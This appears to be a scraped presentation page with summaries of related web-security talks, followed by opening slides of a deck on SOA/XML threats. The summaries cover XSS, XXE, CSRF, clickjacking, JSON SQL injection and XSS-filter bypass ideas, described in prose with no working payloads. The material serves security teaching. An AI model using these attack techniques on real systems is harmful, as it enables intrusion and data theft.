The document discusses security challenges with service-oriented architectures (SOA) and web services. It introduces SOA, web services, and web 2.0, and describes the growing adoption of these technologies. It then presents the XML/SOA threat model, which includes payload/content threats that target back-end systems or end users, XML misuse/abuse through injection and structure manipulation attacks, and infrastructure attacks. Examples of specific attacks are provided like SQL injection, XML entity expansion attacks, and denial of service attacks.
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
This document discusses DOM cross-site scripting (XSS) vulnerabilities and a new tool called VSA that aims to automatically find such vulnerabilities. It notes that DOM XSS is difficult to detect as it occurs client-side, but that VSA claims to find many more vulnerabilities than traditional tools through running entirely on the browser where JavaScript executes. The document provides examples of top companies that have had DOM XSS issues found via bug bounty programs. It also includes a question about whether readers want VSA to scan their sites.
The document discusses security issues that can occur on the web front end, including cross-site scripting (XSS), cross-site request forgery (CSRF), and hijacking. It covers how the same-origin policy works and can be relaxed through mechanisms like document.domain and CORS. Specific types of XSS like persistent and DOM-based XSS are described. The document also discusses CSRF, hijacking techniques like clickjacking, and methods for finding vulnerabilities like XSS filtering and fuzzing. Defensive techniques like X-Frame-Options, Content Security Policy, HTTPS, and CSRF tokens are recommended.
My presentation from Framsia.
Topics:
XSS (reflected, stored, dom-based)
CSRF
Clickjacking
Header based approaches (CSP, X-frame-options)
EcmaScript5
HTML5
Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias
This document discusses cross-site scripting (XSS) attacks. It defines XSS as an attack where malicious scripts are injected into otherwise trusted websites. The document outlines three types of XSS attacks and provides examples of real-world XSS worms. It explains how to exploit stored, reflected, and DOM-based XSS vulnerabilities. Finally, it recommends ways to prevent XSS, including input and output filtering, encoding output, and using mitigations like HttpOnly cookies and content security policies.
This document discusses DOM based cross-site scripting (XSS) and methods for detecting it. It begins by explaining what DOM and XSS are, and defines DOM based XSS as exploiting client-side script execution by modifying the DOM environment. Next, it provides examples of how DOM based XSS can work by manipulating DOM objects like document.location. The document concludes by outlining approaches for detecting DOM based XSS including general analysis, using the headless browser PhantomJS to programmatically interact with web pages, and leveraging a modified version of PhantomJS called Tainted PhantomJS that is designed specifically for DOM based XSS detection.
Video recording of the talk: https://connect.ruhr-uni-bochum.de/p3g2butmrt4/
HTML5 is quickly gaining media attention and popularity among browser vendors and web developers. Having tremendous features, together with its sister specifications like Drag & Drop API, File API or Geolocation it allows developers to build rich web applications that easily blend with desktop & mobile environments.
The talk will be focused on finding the weakest link and combining several recent attack techniques to turn a security vulnerability into a successful exploit.
We'll show how to build a successful advanced UI-Redressing attack (also known as clickjacking), presenting the latest findings in this field, including malicious games and quizes. We'll work on file upload functionalities in current web applications and see how attackers might use HTML5 APIs for their advantage. Putting all these building blocks together will enable us to launch an attack and exploit even the otherwise unexploitable vulnerabilities.
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
This document discusses DOM cross-site scripting (XSS) vulnerabilities and a new tool called VSA that aims to automatically find such vulnerabilities. It notes that DOM XSS is difficult to detect as it occurs client-side, but that VSA claims to find many more vulnerabilities than traditional tools through running entirely on the browser where JavaScript executes. The document provides examples of top companies that have had DOM XSS issues found via bug bounty programs. It also includes a question about whether readers want VSA to scan their sites.
The document discusses security issues that can occur on the web front end, including cross-site scripting (XSS), cross-site request forgery (CSRF), and hijacking. It covers how the same-origin policy works and can be relaxed through mechanisms like document.domain and CORS. Specific types of XSS like persistent and DOM-based XSS are described. The document also discusses CSRF, hijacking techniques like clickjacking, and methods for finding vulnerabilities like XSS filtering and fuzzing. Defensive techniques like X-Frame-Options, Content Security Policy, HTTPS, and CSRF tokens are recommended.
My presentation from Framsia.
Topics:
XSS (reflected, stored, dom-based)
CSRF
Clickjacking
Header based approaches (CSP, X-frame-options)
EcmaScript5
HTML5
Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias
This document discusses cross-site scripting (XSS) attacks. It defines XSS as an attack where malicious scripts are injected into otherwise trusted websites. The document outlines three types of XSS attacks and provides examples of real-world XSS worms. It explains how to exploit stored, reflected, and DOM-based XSS vulnerabilities. Finally, it recommends ways to prevent XSS, including input and output filtering, encoding output, and using mitigations like HttpOnly cookies and content security policies.
This document discusses DOM based cross-site scripting (XSS) and methods for detecting it. It begins by explaining what DOM and XSS are, and defines DOM based XSS as exploiting client-side script execution by modifying the DOM environment. Next, it provides examples of how DOM based XSS can work by manipulating DOM objects like document.location. The document concludes by outlining approaches for detecting DOM based XSS including general analysis, using the headless browser PhantomJS to programmatically interact with web pages, and leveraging a modified version of PhantomJS called Tainted PhantomJS that is designed specifically for DOM based XSS detection.
Video recording of the talk: https://connect.ruhr-uni-bochum.de/p3g2butmrt4/
HTML5 is quickly gaining media attention and popularity among browser vendors and web developers. Having tremendous features, together with its sister specifications like Drag & Drop API, File API or Geolocation it allows developers to build rich web applications that easily blend with desktop & mobile environments.
The talk will be focused on finding the weakest link and combining several recent attack techniques to turn a security vulnerability into a successful exploit.
We'll show how to build a successful advanced UI-Redressing attack (also known as clickjacking), presenting the latest findings in this field, including malicious games and quizes. We'll work on file upload functionalities in current web applications and see how attackers might use HTML5 APIs for their advantage. Putting all these building blocks together will enable us to launch an attack and exploit even the otherwise unexploitable vulnerabilities.
When Ajax Attacks! Web application security fundamentalsSimon Willison
The document is a presentation about web application security fundamentals and attacks. It discusses topics like cross-site scripting (XSS), cross-site request forgery (CSRF), UTF-7 encoding, and other techniques like JSON parsing (JSONP). In the past, security tutorials focused on not trusting user input, avoiding SQL injection, and preventing JavaScript injection, but the presenter aims to discuss more modern attacks.
Local storage can expand the attack surface for web applications by allowing sensitive data to be accessed through malware or viruses. It is also vulnerable to cross-site scripting (XSS) attacks, where malicious code could harvest and transmit stored data. Additionally, lack of privacy controls enables persistent user tracking across domains and invasion of privacy. Proper security defenses and protections are needed to mitigate risks from local storage.
JSON SQL Injection and the Lessons LearnedKazuho Oku
This document discusses JSON SQL injection and lessons learned from vulnerabilities in SQL query builders. It describes how user-supplied JSON input containing operators instead of scalar values could manipulate queries by injecting conditions like id!='-1' instead of a specific id value. This allows accessing unintended data. The document examines how SQL::QueryMaker and a strict mode in SQL::Maker address this by restricting query parameters to special operator objects or raising errors on non-scalar values. While helpful, strict mode may break existing code, requiring changes to parameter handling. The vulnerability also applies to other languages' frameworks that similarly convert arrays to SQL IN clauses.
The document discusses the goals and design of the IE8 XSS filter, which aims to block cross-site scripting attacks. It outlines scenarios that are protected, such as injections into HTML tags and JavaScript strings. It then describes several ways to potentially bypass the filter, such as using fragmented injections across multiple parameters, HTML-only injections, and same-site navigation checks. The document provides technical details on the filter's heuristics and how certain encoding tricks may allow escaping its rules.
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
The document discusses cross-site scripting (XSS) attacks that can occur outside of web browsers on desktop and mobile platforms. It provides examples of XSS vulnerabilities found in Skype, Adium, Android's Gmail app, Google Earth, and outlines a tool built to automate discovery and exfiltration of files across platforms like Mac, Android and others. The document encourages developers to properly filter HTML and secure apps from XSS attacks.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
JSON Fuzzing: New approach to old problemstitanlambda
The document describes a new approach to JSON fuzzing developed by the authors. It notes that existing fuzzing tools do not support JSON format testing. The authors extended an existing Firefox addon to add JSON parsing and fuzzing capabilities. This allows converting a JSON request to name-value pairs for fuzzing, fuzzing the values, converting back to JSON format and sending to the application. A demo is provided and future work discussed, such as supporting different JSON formats and integrating the technique into other tools.
Often, web developers keep hearing about "Same Origin Policy (SOP)" of browsers but live with half-knowledge or with several confusions. This session attempts to clear the misconceptions of SOP.
http://www.powerofcommunity.net/pastcon_2008.html & http://xcon.xfocus.org/XCon2008/index.html
The Same Origin Policy is the most talked about security policy which relates to web applications, it is the constraint within browsers that ideally stops active content from different origins arbitrarily communicating with each other. This policy has given rise to the class of bugs known as Cross-Site Scripting (XSS) vulnerabilities, though a more accurate term is usually JavaScript injection, where the ability to force an application to echo crafted data gives an attacker the ability to execute JavaScript within the context of the vulnerable origin.
This talk takes the view that the biggest weakness with the Same Origin Policy is that it must be implemented by every component of the browser independently, and if any component implements it differently to other components then the security posture of the browser is altered. As such this talk will examine how the 'Same Origin Policy' is implemented in different circumstances, especially in active content, and where the Same Origin Policy is not really enforced at all.
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
This document discusses several HTML5-based attacks that could be used to compromise a target named Bob. It describes using filejacking to access files on Bob's computer, poisoning Bob's app cache to gain persistent access, performing silent file uploads to plant incriminating evidence, using UI redressing to trick Bob into actions, and extracting sensitive information from Bob's employer's internal sites using drag-and-drop content extraction. The document provides proof-of-concept demos and notes limitations but emphasizes that HTML5 expands attack possibilities against unaware users. It concludes by encouraging developers to implement proper defenses like X-Frame-Options to prevent framing attacks.
Same-origin policy is an important security concept of the modern browser languages like JavaScript but becomes an obstacle for developers when building complex client-side apps. Over time there have been lots of ingenious workarounds using JSON-P, IFRAME and proxies. As of January 2013 the well known Cross Origin Resource Sharing (CORS) comes as proposed standard by W3C and has now native support by all major browsers.
This document discusses security challenges with web applications that combine content from multiple sources (mashups). It covers how the same-origin policy isolates origins but exempts scripts, allowing cross-site scripting attacks. Frame-based communication and the postMessage API provide secure cross-origin messaging capabilities. The document recommends sandboxing iframes and using features like CORS to mitigate risks in mashups.
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
The document summarizes techniques for preventing clickjacking attacks, including frame busting code, the X-Frame-Options HTTP header, and Content Security Policy. It provides examples of how to implement these techniques and their limitations. It encourages attendees to check their own websites and applications for clickjacking vulnerabilities and ways to secure them against these risks.
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
This talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and hold trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden),DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland),CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada),PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
This document provides an overview of a presentation on hacking and hardening web services. The presentation discusses the components and terminology of web services, common threats to web services related to transport, parsing, deployment, and service code. It then describes the steps to hack a web service by learning about the system, doing homework, launching an attack, and cleaning up. Finally, it outlines techniques for hardening web services to mitigate threats through implementing confidentiality and integrity enforcement, XML structure threat detection, secure deployment practices, input validation, and virus detection.
Web services allow different applications to communicate over the web using XML. They operate on the server side and can perform tasks when called by client applications. While web services provide application integration, they also present some security concerns like buffer overflows, XML injections, and session hijacking that could allow attackers to damage systems or steal data. Tools are available to help secure web applications and detect vulnerabilities in web services.
When Ajax Attacks! Web application security fundamentalsSimon Willison
The document is a presentation about web application security fundamentals and attacks. It discusses topics like cross-site scripting (XSS), cross-site request forgery (CSRF), UTF-7 encoding, and other techniques like JSON parsing (JSONP). In the past, security tutorials focused on not trusting user input, avoiding SQL injection, and preventing JavaScript injection, but the presenter aims to discuss more modern attacks.
Local storage can expand the attack surface for web applications by allowing sensitive data to be accessed through malware or viruses. It is also vulnerable to cross-site scripting (XSS) attacks, where malicious code could harvest and transmit stored data. Additionally, lack of privacy controls enables persistent user tracking across domains and invasion of privacy. Proper security defenses and protections are needed to mitigate risks from local storage.
JSON SQL Injection and the Lessons LearnedKazuho Oku
This document discusses JSON SQL injection and lessons learned from vulnerabilities in SQL query builders. It describes how user-supplied JSON input containing operators instead of scalar values could manipulate queries by injecting conditions like id!='-1' instead of a specific id value. This allows accessing unintended data. The document examines how SQL::QueryMaker and a strict mode in SQL::Maker address this by restricting query parameters to special operator objects or raising errors on non-scalar values. While helpful, strict mode may break existing code, requiring changes to parameter handling. The vulnerability also applies to other languages' frameworks that similarly convert arrays to SQL IN clauses.
The document discusses the goals and design of the IE8 XSS filter, which aims to block cross-site scripting attacks. It outlines scenarios that are protected, such as injections into HTML tags and JavaScript strings. It then describes several ways to potentially bypass the filter, such as using fragmented injections across multiple parameters, HTML-only injections, and same-site navigation checks. The document provides technical details on the filter's heuristics and how certain encoding tricks may allow escaping its rules.
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
The document discusses cross-site scripting (XSS) attacks that can occur outside of web browsers on desktop and mobile platforms. It provides examples of XSS vulnerabilities found in Skype, Adium, Android's Gmail app, Google Earth, and outlines a tool built to automate discovery and exfiltration of files across platforms like Mac, Android and others. The document encourages developers to properly filter HTML and secure apps from XSS attacks.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
JSON Fuzzing: New approach to old problemstitanlambda
The document describes a new approach to JSON fuzzing developed by the authors. It notes that existing fuzzing tools do not support JSON format testing. The authors extended an existing Firefox addon to add JSON parsing and fuzzing capabilities. This allows converting a JSON request to name-value pairs for fuzzing, fuzzing the values, converting back to JSON format and sending to the application. A demo is provided and future work discussed, such as supporting different JSON formats and integrating the technique into other tools.
Often, web developers keep hearing about "Same Origin Policy (SOP)" of browsers but live with half-knowledge or with several confusions. This session attempts to clear the misconceptions of SOP.
http://www.powerofcommunity.net/pastcon_2008.html & http://xcon.xfocus.org/XCon2008/index.html
The Same Origin Policy is the most talked about security policy which relates to web applications, it is the constraint within browsers that ideally stops active content from different origins arbitrarily communicating with each other. This policy has given rise to the class of bugs known as Cross-Site Scripting (XSS) vulnerabilities, though a more accurate term is usually JavaScript injection, where the ability to force an application to echo crafted data gives an attacker the ability to execute JavaScript within the context of the vulnerable origin.
This talk takes the view that the biggest weakness with the Same Origin Policy is that it must be implemented by every component of the browser independently, and if any component implements it differently to other components then the security posture of the browser is altered. As such this talk will examine how the 'Same Origin Policy' is implemented in different circumstances, especially in active content, and where the Same Origin Policy is not really enforced at all.
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
This document discusses several HTML5-based attacks that could be used to compromise a target named Bob. It describes using filejacking to access files on Bob's computer, poisoning Bob's app cache to gain persistent access, performing silent file uploads to plant incriminating evidence, using UI redressing to trick Bob into actions, and extracting sensitive information from Bob's employer's internal sites using drag-and-drop content extraction. The document provides proof-of-concept demos and notes limitations but emphasizes that HTML5 expands attack possibilities against unaware users. It concludes by encouraging developers to implement proper defenses like X-Frame-Options to prevent framing attacks.
Same-origin policy is an important security concept of the modern browser languages like JavaScript but becomes an obstacle for developers when building complex client-side apps. Over time there have been lots of ingenious workarounds using JSON-P, IFRAME and proxies. As of January 2013 the well known Cross Origin Resource Sharing (CORS) comes as proposed standard by W3C and has now native support by all major browsers.
This document discusses security challenges with web applications that combine content from multiple sources (mashups). It covers how the same-origin policy isolates origins but exempts scripts, allowing cross-site scripting attacks. Frame-based communication and the postMessage API provide secure cross-origin messaging capabilities. The document recommends sandboxing iframes and using features like CORS to mitigate risks in mashups.
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
The document summarizes techniques for preventing clickjacking attacks, including frame busting code, the X-Frame-Options HTTP header, and Content Security Policy. It provides examples of how to implement these techniques and their limitations. It encourages attendees to check their own websites and applications for clickjacking vulnerabilities and ways to secure them against these risks.
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
This talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and hold trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden),DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland),CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada),PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
This document provides an overview of a presentation on hacking and hardening web services. The presentation discusses the components and terminology of web services, common threats to web services related to transport, parsing, deployment, and service code. It then describes the steps to hack a web service by learning about the system, doing homework, launching an attack, and cleaning up. Finally, it outlines techniques for hardening web services to mitigate threats through implementing confidentiality and integrity enforcement, XML structure threat detection, secure deployment practices, input validation, and virus detection.
Web services allow different applications to communicate over the web using XML. They operate on the server side and can perform tasks when called by client applications. While web services provide application integration, they also present some security concerns like buffer overflows, XML injections, and session hijacking that could allow attackers to damage systems or steal data. Tools are available to help secure web applications and detect vulnerabilities in web services.
Web applications can provide convenience and efficiency, however there are also a number of new security threats, which could potentially pose significant risks to an organisation's information technology infrastructure if not handled properly.
Fundamental and Practice.
Explain about microservices characters and pattern. And also how to be good build microservices. And also additional the scale cube and CAP theory.
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston
This document discusses challenges with testing web services and proposes improvements. It notes that current tools, methodologies, and testing environments for assessing web service security are inadequate. The document advocates aligning web service testing with the Penetration Testing Execution Standard methodology. It also highlights new attacks against web services and demos tools like Metasploit modules for assessing web services and the Damn Vulnerable Web Services testing environment.
Wireless Information Security System via Role based Access Control Pattern Us...ijcnes
Business delivery value added more via security services to the service providers and service users. Organization system developing various models to achieve the security system according to the modern development and technology; which they requires for their own operations and for their interactions within departments, customers and partners. Business securities pattern will be aid to establish a powerful methodology to identify and understand these relationships to maximize the value of security system. This paper presents a study of important business patterns in Roles Right Definition Model Use Cases linking to Object oriented Analysis and Design approach for Secured Internet Information access.
A Survey on Authorization Systems for Web Applicationsiosrjce
IOSR Journal of Computer Engineering (IOSR-JCE) is a double blind peer reviewed International Journal that provides rapid publication (within a month) of articles in all areas of computer engineering and its applications. The journal welcomes publications of high quality papers on theoretical developments and practical applications in computer technology. Original research papers, state-of-the-art reviews, and high quality technical notes are invited for publications.
This document provides a survey of various authorization systems that have been proposed for web applications and web services. It begins with an introduction to web services and common security issues and attacks. It then describes several existing authorization models and frameworks that have been used for web services, including attribute-based access control, role-based access control using LDAP, and interactive access control. The document compares these different authorization techniques based on factors like separation of duties, fine-grained authorization, nature of the system, and performance. It concludes that most proposed systems authorize based on role models but few can dynamically authorize requests or integrate well with service-oriented architectures.
Oopsla 2007 - The Web: Distributed Objects Realized!Stuart Charlton
The document discusses the evolution of distributed computing architectures from distributed objects to web services and REST. It argues that REST provides an architectural style that enables a globally scalable and interoperable system for sharing information on the web by defining constraints around resources, representations, and relationships between them using hypermedia. The document outlines some key differences between REST and prior distributed object approaches in terms of assumptions, requirements, and enabling global interoperability through a uniform interface.
This document discusses IBM DataPower and how it can be used to securely expose APIs and services. It provides an overview of DataPower's key capabilities including security, protocol support, and an application development model. Specific services that DataPower provides are discussed such as the web service proxy, XML firewall, and web application firewall. The document also covers how DataPower can implement various security features and policies to control access and traffic. Finally, it presents some high-level questions to consider when shaping an API strategy.
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
This document discusses the Heartbleed vulnerability in OpenSSL and its potential impacts. Heartbleed is a bug in the OpenSSL cryptography library that exposes the contents of the server's memory, including private keys and user session cookies. An attacker can exploit Heartbleed to steal sensitive data from vulnerable servers or impersonate services. The vulnerability had widespread implications because OpenSSL is used to secure a majority of websites. While patching servers and changing passwords addressed direct theft of information, Heartbleed also weakened the security of encrypted communications and online identities.
This document summarizes a presentation on threat modeling for web application deployment. The presentation introduces threat modeling and provides a real-world example of threat modeling an e-commerce site. Key steps in the threat modeling methodology include information gathering, analysis of users, assets, and threats, and defining mitigation strategies. The example analyzes threats to an online store's users, entry points, and remaining assets, and defines mitigation strategies like restricting access, reducing the attack surface, and securing the application and database.
Application Security session given as part of the Solvay Executive Master in IT Management.
Explaining application security challenges for web, mobile, cloud and internet of things.
Positioning OWASP SAMM as structural and measurable framework to get application security under control in the complete application lifecycle.
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
Hacking browser components by Reverse Engineering is emerging as the best way for discovering
potential vulnerabilities across web applications in an era of Rich Internet Applications (RIA). The RIA
space is flooded with technologies like HTML 5, Flex/Flash, Silverlight, extended DOM and numerous
third party libraries. Browsers are the target of hackers, worms and malware with specific scope, almost
on a daily basis. We have seen exploitation of these technologies on popular sites like Facebook, Twitter,
Yahoo, Google, to name a few. The traditional boundaries of web applications are disappearing.
Browsers today host a substantial part of web applications including data access, business logic,
encryption, etc. along with presentation layer. This shift is making browser components a potential
target for hackers. The danger of poorly written browser components being
This document provides an introduction to web development, covering key topics such as:
- A brief history of the internet and how it has evolved from early networks like ARPANET to the development of the World Wide Web in 1990 with URLs, HTTP, servers, browsers and HTML.
- Explanations of static vs. dynamic websites and how the web has progressed from Web 1.0 to newer concepts like Web 2.0, Web 3.0, and Web Science.
- An overview of the client-server model used by the internet, including the request-response loop between clients and servers, as well as different types of servers commonly used.
Detection of webshells in compromised perimeter assets using ML algorithms Rod Soto
Rod Soto and Joseph Zadeh discuss detecting webshells in compromised perimeter assets using machine learning algorithms. They define webshells and how they are commonly used by attackers to gain access to networks. Two approaches are described for detecting webshells using ML: global models that analyze overall asset behavior, and local models that examine individual web server content and traffic patterns. Detecting deviations from normal behavior across both local and global views can help identify compromised assets with webshells.
Service Oriented Architecture for Net Centric Operations based on Open Source...Sanjiva Weerawarana
In this talk I discussed the role of SOA and open source technology in building large scale distributed systems for national defence and regional cooperation. My primary objective was to encourage collaboration in the form of FOSS and open standards to make better software systems for a given military organization or for groups of friendly nations.
Service-oriented Architecture with Respect to ReusabilityYazd University
This document provides an introduction to service-oriented development with a focus on reusability. It includes 4 lectures on topics like introduction to service-oriented architecture, reusability and its relation to SOA, SOA tools, and SOA case studies. The lectures are presented by group members from Shahid Bahonar University of Kerman and cover concepts such as SOA, web services, the SOA lifecycle, and SOA design patterns.
This document summarizes vulnerabilities in web applications and methods to protect against them. It discusses how vulnerabilities can occur from issues like format string exploits, SQL injection, and cross-site scripting. The document also describes different approaches to testing for vulnerabilities, including white-box and black-box testing. Additionally, it analyzes vulnerability information from various organization's lists of top vulnerability categories to provide a comparative overview. The goal is to help organizations identify and address vulnerabilities in their web applications.
1. The SOA/XML Threat Model
and New XML/SOA/Web 2.0 Attacks & Threats
Steve Orrin
Dir of Security Solutions, SSG-SPI
Intel Corp.
2. Agenda
•Intro to SOA/Web 2.0 and the Security Challenge
•The XML/SOA Threat Model
•Details on XML/Web Services & SOA Threats
•Next Generation and Web 2.0 Threats
•The Evolving Enterprise and Environment
•Summary
•Q&A
3. What is SOA?
A service-oriented architecture is essentially a collection of services.
These services communicate with each other and the communication can
involve either simple data passing or direct application execution also it
could involve two or more services coordinating some activity.
What is a Service?
• A service is a function that is well-defined, self-contained, and does not
depend on the context or state of other services.
What is a Web Service?
• Typically a web service is XML/SOAP based and most often described
by WSDL and Schemas. In most SOA implementations a directory
system known as UDDI is used to for Web Service discovery and
central publication.
4. What is Web 2.0?
Web 2.0, a phrase coined by Tim O'Reilly and popularized by the first Web 2.0
conference in 2004, refers to a second generation of web-based communities
and hosted services — such as social-networking sites, wikis and folksonomies
— which facilitate collaboration and sharing between users.
Although the term suggests a new version of the World Wide Web, it does not
refer to an update to Web technical specifications, but to changes in the ways
software developers and end-users use the web as a platform.
Characteristics of Web 2.0
• The transition of web-sites from isolated information silos to sources of
content and functionality, thus becoming computing platforms serving web
applications to end-users
• A social phenomenon embracing an approach to generating and distributing
Web content itself, characterized by open communication, decentralization of
authority, freedom to share and re-use, and "the market as a conversation"
• Enhanced organization and categorization of content, emphasizing deep
linking
Source: Wikipedia, the free encyclopedia
http://en.wikipedia.org/wiki/Web_2
5. It’s a SOA World after all…
Fortune 1000 customers are deploying
datacenter SOA and Web Services apps today
Average XML network traffic load of 24.4%
expected to grow to 35.5% next year
Average number of WS applications across
enterprise companies is up 300% over the last
year
Gartner predicts 46% of IT professional services
market is Web Services related in 2010
Web Services are now the preferred choice for
application development - although performance
barriers prevent widespread implementation
7. Where do SOA Apps & Web 2.0 data come from?
EDI Replacement
Decoupling of DB from C/S apps
EAI & Portals
e-Commerce
ERP/CRM/SFA/SCM
Social Networking & Collaboration
End User data
EAI
9. Example of Services Server Stack
Operating System
Linux, Solaris, Windows, Apple
OS service & libs
NPTL, OpenLDAP
Security libs
PHP
Hardware
NuSOAP
Web Services and RIAs
Web Services
hosting & caching
Apache, Jetty,..
Database
